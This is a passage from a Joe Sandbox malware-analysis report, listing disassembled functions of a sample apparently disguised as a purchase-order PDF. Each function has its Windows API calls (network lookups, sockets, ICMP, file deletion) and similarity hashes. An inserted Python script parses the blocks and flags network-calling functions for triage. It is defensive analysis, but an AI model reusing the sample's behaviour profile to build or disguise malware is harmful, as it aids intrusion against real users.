  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• gethostbyname.WSOCK32(?), ref: 0046BD78
• WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
• inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
• String ID: HH
• API String ID: 1515696956-2761332787
• Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
• Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
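The per-function blocks in this report (API references with their call sites, memory-dump sources, and the Similarity identifiers) follow one fixed layout, which makes them straightforward to turn into structured records for triage rather than reading thousands of lines by hand. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in this layout into records, strips the "Download File" link text that the page export fuses onto the Associated dump names, and flags functions whose imports come from network modules, so the gethostbyname/inet_ntoa routine above can be pulled out by its Opcode ID. The set of network modules is an assumption for illustration; the sample input is constructed from the SendMessageW and gethostbyname blocks on this page, trimmed to a few Associated lines.

```python
"""Parse Joe Sandbox per-function disassembly blocks and flag network callers.

Added example; not part of the Joe Sandbox report or its tooling.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Sample constructed from two blocks on this page (Associated lines trimmed).
SAMPLE = """\
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
APIs
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• gethostbyname.WSOCK32(?), ref: 0046BD78
• WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
• inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
• String ID: HH
• API String ID: 1515696956-2761332787
• Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
"""

# One API reference line in the report, e.g.
#   gethostbyname.WSOCK32(?), ref: 0046BD78
#   GetMenuItemInfoW.USER32 ref: 004497EA                       (no argument list)
#   Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(...), ref: 0045F003
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # link text the page export fuses onto Associated dump names
NETWORK_MODULES = {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}  # assumption: modules worth flagging


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    parent: Optional[str]  # set only for "Part of subcall function" lines


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    dumps: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # IDA plugin + Similarity key/value lines


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split report text into FunctionBlock records; a new record starts at each 'APIs' header."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            continue
        if current is None:
            continue  # text before the first APIs header
        item = line.lstrip("• ").strip()
        if item.endswith(LINK_RESIDUE):
            item = item[: -len(LINK_RESIDUE)].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["parent"]))
        elif section == "Strings":
            current.strings.append(item)
        elif section == "Memory Dump Source":
            current.dumps.append(item)
        else:
            key, sep, value = item.partition(": ")
            if sep:
                current.meta[key] = value
    return blocks


def network_functions(blocks: List[FunctionBlock]) -> List[Tuple[Optional[str], List[str]]]:
    """Return (Opcode ID, [API names]) for every block that calls into a network module."""
    hits = []
    for b in blocks:
        net = [a.name for a in b.apis if a.module.upper() in NETWORK_MODULES]
        if net:
            hits.append((b.meta.get("Opcode ID"), net))
    return hits


if __name__ == "__main__":
    for opcode_id, names in network_functions(parse_blocks(SAMPLE)):
        print(opcode_id, "->", ", ".join(names))
```

Run against a full report export, the same parser yields one record per function; the Opcode ID is what to carry into notes, since it is the stable identifier the Similarity section uses across analyses, while the `ref:` addresses are only meaningful for this build's image base.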
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetMenuItemInfoW.USER32 ref: 004497EA
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
• DrawMenuBar.USER32 ref: 00449828
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: 6c8e4ef583cbe43a73f2b9829f4c1f84e348ebd42a74c1206e039d61b98ed7cc
• Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
• Opcode Fuzzy Hash: 6c8e4ef583cbe43a73f2b9829f4c1f84e348ebd42a74c1206e039d61b98ed7cc
• Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AllocTask_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: hkG
                                                                                                                                                                                                                                                                                                            • API String ID: 2651040394-3610518997
                                                                                                                                                                                                                                                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
• Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
• Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
• Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
• Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: ccb5d32199bb693159941712c090f8bd24187e8f021d7f69bd072a0570b18ec0
• Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
• Opcode Fuzzy Hash: ccb5d32199bb693159941712c090f8bd24187e8f021d7f69bd072a0570b18ec0
• Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
APIs
• __flush.LIBCMT ref: 00414630
• __fileno.LIBCMT ref: 00414650
• __locking.LIBCMT ref: 00414657
• __flsbuf.LIBCMT ref: 00414682
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3240763771-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
APIs
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
• VariantCopy.OLEAUT32(?,?), ref: 00478259
• VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
• VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID:
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
Similarity
• API ID: ErrorLast$socket
• String ID:
APIs
• ClientToScreen.USER32(00000000,?), ref: 00441CDE
• GetWindowRect.USER32(?,?), ref: 00441D5A
• PtInRect.USER32(?,?,?), ref: 00441D6F
• MessageBeep.USER32(00000000), ref: 00441DF2
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
• __isleadbyte_l.LIBCMT ref: 004238B2
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
• Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
• GetLastError.KERNEL32(?,00000000), ref: 0045D12B
• DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
• Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
APIs
• GetParent.USER32(?), ref: 004505BF
• DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
• DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
• DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
• Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
• Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
APIs
  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
• __itow.LIBCMT ref: 00461461
• __itow.LIBCMT ref: 004614AB
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$__itow$_wcslen
• String ID:
• API String ID: 2875217250-0
• Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
• Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
APIs
• _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
